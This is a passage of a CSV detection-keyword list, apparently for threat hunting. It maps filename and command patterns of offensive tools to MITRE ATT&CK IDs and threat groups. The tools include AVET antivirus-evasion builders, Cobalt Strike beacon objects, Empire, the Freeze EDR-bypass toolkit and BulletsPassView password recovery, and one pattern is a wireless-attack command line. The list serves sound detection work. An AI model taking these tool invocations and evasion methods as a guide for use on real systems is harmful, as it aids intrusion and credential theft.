TA0010,N/A,N/A,Discovery,https://github.com/redhuntlabs/BucketLoot,1,1,N/A,7,3,232,28,2023-09-22T10:26:35Z,2023-07-17T09:06:14Z -*bucketloot-windows32.exe*,offensive_tool_keyword,BucketLoot,BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text,T1562.007 - T1119 - T1530,TA0006 - TA0010,N/A,N/A,Discovery,https://github.com/redhuntlabs/BucketLoot,1,1,N/A,7,3,232,28,2023-09-22T10:26:35Z,2023-07-17T09:06:14Z -*bucketloot-windows64.exe*,offensive_tool_keyword,BucketLoot,BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text,T1562.007 - T1119 - T1530,TA0006 - TA0010,N/A,N/A,Discovery,https://github.com/redhuntlabs/BucketLoot,1,1,N/A,7,3,232,28,2023-09-22T10:26:35Z,2023-07-17T09:06:14Z -*buffer_overflow.py*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*bug: pid active in ptrace_sandbox_free*,greyware_tool_keyword,vsftpd,Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts,T1071.004 - T1078.004,TA0011 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/dagwieers/vsftpd/,1,0,greyware tool - risks of False positive !,N/A,1,47,66,2020-11-10T13:07:55Z,2013-06-13T10:11:54Z -*-Build $RandomAttackPath*,offensive_tool_keyword,badazure,BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create 
vulnerable tenants with multiple attack paths,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation Tools,https://github.com/mvelazc0/BadZure/,1,0,N/A,5,4,302,18,2023-07-27T15:40:41Z,2023-05-05T04:52:21Z -*build Freeze.go*,offensive_tool_keyword,Freeze,Freeze is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls. and alternative execution methods,T1055 - T1055.001 - T1055.003 - T1055.004 - T1055.005 - T1055.006 - T1055.007 - T1055.008 - T1055.012 - T1055.013 - T1055.014 - T1055.015 - T1055.016 - T1055.017 - T1055.018 - T1055.019 - T1055.020 - T1055.021 - T1055.022 - T1055.023 - T1055.024 - T1055.025 - T1112,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/optiv/Freeze,1,0,N/A,N/A,10,1333,166,2023-08-18T17:25:07Z,2022-09-21T14:40:59Z -*build SourcePoint.go*,offensive_tool_keyword,cobaltstrike,SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/Tylous/SourcePoint,1,0,N/A,10,10,792,122,2022-11-17T01:04:04Z,2021-08-06T20:55:26Z -*build Supernova.go*,offensive_tool_keyword,Supernova,securely encrypt raw shellcodes,T1027 - T1055.004 - T1140,TA0002 - TA0005 - TA0042,N/A,N/A,Exploitation tools,https://github.com/nickvourd/Supernova,1,0,N/A,10,4,337,49,2023-09-28T20:56:28Z,2023-08-08T11:30:34Z -*build.ps1 -commands * -profile *selfcontained -singlefile*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,0,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*build.ps1 -profiles * -commands * -compressed*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,0,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*build/breg.cna*,offensive_tool_keyword,cobaltstrike,Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ausecwa/bof-registry,1,1,N/A,10,10,17,7,2021-02-11T04:38:28Z,2021-01-29T05:07:47Z -*build_40xshikata_revhttpsunstaged_win32.sh*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. 
have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,1,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*build_50xshikata_quiet_revhttps_win32.sh*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,1,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*build_50xshikata_revhttps_win32.sh*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,1,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*build_asciimsf_fromcmd_revhttps_win32.sh*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,1,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z -*build_asciimsf_revhttps_win32.sh*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. 
which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,1,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z
-*build_avetenc_dynamicfromfile_revhttps_win32.sh*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,1,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z
-*build_avetenc_fopen_revhttps_win32.sh*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,1,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z
-*build_avetenc_mtrprtrxor_revhttps_win64.sh*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. 
have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,1,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z
-*build_c_shellcode*,offensive_tool_keyword,cobaltstrike,A protective and Low Level Shellcode Loader that defeats modern EDR systems.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/cribdragg3r/Alaris,1,1,N/A,10,10,846,136,2021-11-01T05:00:43Z,2020-02-22T15:42:37Z
-*build_calcfromcmd_50xshikata_revhttps_win32.sh*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. 
have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,1,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z
-*build_calcfrompowersh_50xshikata_revhttps_win32.sh*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,1,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z
-*build_checkdomain_rc4_mimikatz.sh*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,1,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z
-*build_disablewindefpsh_xorfromcmd_revhttps_win64.sh*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. 
have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,1,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z
-*build_dkmc_downloadexecshc_revhttps_win32.sh*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,1,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z
-*build_downloadbitsadmin_mtrprtrxor_revhttps_win64.sh*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,1,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z
-*build_downloadbitsadmin_revhttps_win32.sh*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. 
have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,1,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z
-*build_downloadcertutil_revhttps_win32.sh*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,1,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z
-*build_downloadcurl_mtrprtrxor_revhttps_win64.sh*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,1,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z
-*build_sleep_rc4_mimikatz.sh*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,1,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z
-*build_svc_20xshikata_bindtcp_win32.sh*,offensive_tool_keyword,avet,AVET is an AntiVirus Evasion Tool. 
which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.,T1055 - T1027 - T1566,TA0002 - TA0003 - TA0008,N/A,N/A,Defense Evasion,https://github.com/govolution/avet,1,1,N/A,10,10,1523,344,2023-03-24T16:50:08Z,2017-01-28T14:56:47Z
-*BuildBOFs.exe*,offensive_tool_keyword,cobaltstrike,C# .Net 5.0 project to build BOF (Beacon Object Files) in mass,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ceramicskate0/BOF-Builder,1,1,N/A,10,10,23,3,2023-07-25T22:19:27Z,2021-09-07T01:28:11Z
-*BuildBOFs.sln*,offensive_tool_keyword,cobaltstrike,C# .Net 5.0 project to build BOF (Beacon Object Files) in mass,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - 
T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ceramicskate0/BOF-Builder,1,1,N/A,10,10,23,3,2023-07-25T22:19:27Z,2021-09-07T01:28:11Z
-*Building SYSTEM impersonation*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Invoke-MS16032.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z
-*BulletsPassView.exe*,offensive_tool_keyword,bulletpassview,BulletsPassView is a password recovery tool that reveals the passwords stored behind the bullets in the standard password text-box of Windows operating system and Internet Explorer Web browser. After revealing the passwords. 
you can easily copy them to the clipboard or save them into text/html/csv/xml file.,T1003 - T1021 - T1056 - T1110 - T1212 - T1552,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,Credential Access,https://www.nirsoft.net/utils/bullets_password_view.html,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*BulletsPassView.zip*,offensive_tool_keyword,bulletpassview,BulletsPassView is a password recovery tool that reveals the passwords stored behind the bullets in the standard password text-box of Windows operating system and Internet Explorer Web browser. After revealing the passwords. you can easily copy them to the clipboard or save them into text/html/csv/xml file.,T1003 - T1021 - T1056 - T1110 - T1212 - T1552,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,Credential Access,https://www.nirsoft.net/utils/bullets_password_view.html,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*BulletsPassView_setup.exe*,offensive_tool_keyword,bulletpassview,BulletsPassView is a password recovery tool that reveals the passwords stored behind the bullets in the standard password text-box of Windows operating system and Internet Explorer Web browser. After revealing the passwords. you can easily copy them to the clipboard or save them into text/html/csv/xml file.,T1003 - T1021 - T1056 - T1110 - T1212 - T1552,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,Credential Access,https://www.nirsoft.net/utils/bullets_password_view.html,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*BulletsPassView_x64.exe*,offensive_tool_keyword,bulletpassview,BulletsPassView is a password recovery tool that reveals the passwords stored behind the bullets in the standard password text-box of Windows operating system and Internet Explorer Web browser. After revealing the passwords. 
you can easily copy them to the clipboard or save them into text/html/csv/xml file.,T1003 - T1021 - T1056 - T1110 - T1212 - T1552,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,Credential Access,https://www.nirsoft.net/utils/bullets_password_view.html,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*bully wlan1mon -b * -c 9 -S -F -B -v 3*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*bunny.deb.parrot.sh/*,offensive_tool_keyword,parrot os,Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.,T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105,TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011,N/A,N/A,Exploitation OS,https://www.parrotsec.org/download/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*bupload_raw*.dll*,offensive_tool_keyword,cobaltstrike,New UAC bypass for Silent Cleanup for CobaltStrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EncodeGroup/UAC-SilentClean,1,1,N/A,10,10,173,32,2021-07-14T13:51:02Z,2020-10-07T13:25:21Z
-*burnett_top_1024.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z
-*Burp Suite*,offensive_tool_keyword,burpsuite,The class-leading vulnerability scanning. penetration testing. 
and web app security platform,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Network Exploitation Tools,https://portswigger.net/burp,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*burp*PayloadParser.py*,offensive_tool_keyword,burpsuite,PayloadParser - Burp Suite NMap Parsing Interface in Python,T1583 - T1595 - T1190,TA0001 - TA0003 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/infodel/burp.extension-payloadparser,1,1,N/A,N/A,1,4,3,2013-03-15T20:41:45Z,2013-03-15T20:39:23Z
-*burp*SQLMapper.xml*,offensive_tool_keyword,burpsuite,CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API,T1583 - T1595 - T1190,TA0001 - TA0002 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/JGillam/burp-co2,1,1,N/A,N/A,2,142,40,2019-12-24T22:30:15Z,2015-04-19T03:38:34Z
-*burp.extension-payloadparser*,offensive_tool_keyword,burpsuite,PayloadParser - Burp Suite NMap Parsing Interface in Python,T1583 - T1595 - T1190,TA0001 - TA0003 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/infodel/burp.extension-payloadparser,1,1,N/A,N/A,1,4,3,2013-03-15T20:41:45Z,2013-03-15T20:39:23Z
-*burp_log_*.log*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,0,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z
